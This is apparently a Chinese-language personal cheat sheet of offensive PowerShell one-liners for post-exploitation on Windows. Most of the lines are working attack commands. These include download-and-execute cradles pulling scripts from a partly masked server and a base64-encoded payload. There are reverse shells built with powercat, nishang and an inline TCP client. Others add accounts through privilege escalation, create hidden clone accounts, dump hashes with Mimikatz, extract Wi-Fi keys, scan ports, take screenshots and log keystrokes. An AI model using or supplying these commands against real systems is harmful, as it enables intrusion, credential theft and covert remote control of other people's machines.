前言
在看过大量的powershell资料后,总结了几条比较适用的命令,当做笔记。以下命令如无说明可以在cmd下无交互运行。
是否支持powershell
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)
下载文件
PowerShell 2.0(win 7)
powershell (New-Object Net.WebClient).DownloadFile('http://47.94.80.xxx/ps/a.ps1','E:\phpstudy_pro\WWW\a.ps1')
PowerShell 3.0版本后(win 8之后)
内置Invoke-WebRequest (wget)
wget "http://10.0.0.10/nc.exe" -outfile "nc.exe"`
base64 编码
$fileContent = "IEX(new-object System.Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
$encoded
base64 编码解码文件
编码
$PEBytes = [System.IO.File]::ReadAllBytes("scan.exe")
$Base64Payload = [System.Convert]::ToBase64String($PEBytes)
Set-Content base64.txt -Value $Base64Payload
解码
$Base64Bytes = Get-Content ("base64.txt")
$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)
[System.IO.File]::WriteAllBytes("scan.exe",$PEBytes)
反弹shell
探测出网端口
powershell.exe -c "1..100 | % { tnc -informationlevel quiet baidu.com -port $_} "
缩小窗口取代隐藏窗口
powershell.exe -nop -c "$w=$Host.UI.RawUI.WindowSize;$w.Width=1;$w.Height=1;$Host.UI.RawUI.Set_windowsize($w);IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx/a'))"
反弹cmd
powershell IEX (New-Object Net.Webclient).DownloadString('http://47.94.9.xx/ps/powercat.ps1'); powercat -c 192.168.203.140 -p 9999 -e cmd
反弹powershell
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
socks反弹powershell
powershell -c "$client = New-Object Net.Sockets.TCPClient('106.xxx.xxx.xxx',9090);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback=(iex $data 2>&1 | Out-String );$sendata =$sendback+'PS >';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendata);$leng=$sendbyte.Length;$stream.Write($sendbyte,0,$leng);$stream.Flush()};$client.Close()"
反弹msf
powershell "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"
查看列出已安装的修补程序
powershell Get-WmiObject -Class Win32_QuickFixEngineering -ComputerName .
提权加账号
仅用于本地提权
powershell -c "& {Import-Module 'c:\Invoke-MS16-135.ps1';Invoke-MS16-135 -Application cmd.exe -commandline '/c net user test test!@#1234 /add'}"
在线导出hash(需要管理员权限)
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Get-PassHashes.ps1');Get-PassHashes
建立隐藏账户(需要管理员权限)
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Create-Clone.ps1'); Create-Clone -u demo$ -p test123 -cu cseroad
mimikatz获取明文(需要管理员权限)
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
信息收集
本机信息收集
判断是否是虚拟机
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxz/nishang/Gather/Check-VM.ps1');Check-VM
查看服务
powershell Get-WmiObject Win32_QuickFixEngineering
查看共享
powershell Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share
查看登录的用户
powershell Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
查看是否有AV
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
查看各种信息
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-Information.ps1');Get-Information
获取wifi密码
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-WLAN-Keys.ps1');Get-Wlan-Keys
内网信息收集
内置扫描端口
powershell -c "1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\"10.211.55.10\",$_)) \"Port $_ is open!\"} 2>$null"
扫描端口(需要切换到powershell环境)
IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.167.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389"
DNS反向解析
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1');Invoke-ReverseDnsLookup '192.168.197.220-192.168.197.240'
后渗透
屏幕记录
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1');Get-TimedScreenshot -Path E:\ -Interval 5 -EndTime 10:00
键盘记录(需要切换到powershell环境)
IEX (New-Object Net.WebClient).DownloadString("http://47.94.80.xxx/ps/PowerSploit/Exfiltration/Get-Keystrokes.ps1");Get-Keystrokes -LogPath .\keylog.txt
本地批量ping域名脚本
<#Author :PWN.ZHANG@XTPEEPS>CN#>
if($args[0] -ne ""){
$File=Get-Content $args[0]
foreach ($skuLine in $File) {
Write-Host -NoNewline $skuLine " "
(((ping $skuLine -n 1) -match "^(\d{1,3}\.){3}\d{1,3}") -split " ")[0]}
<#Sleep 100#>
}
Else{
"useage: ns_lookup.ps1 <urlfile_path>"
}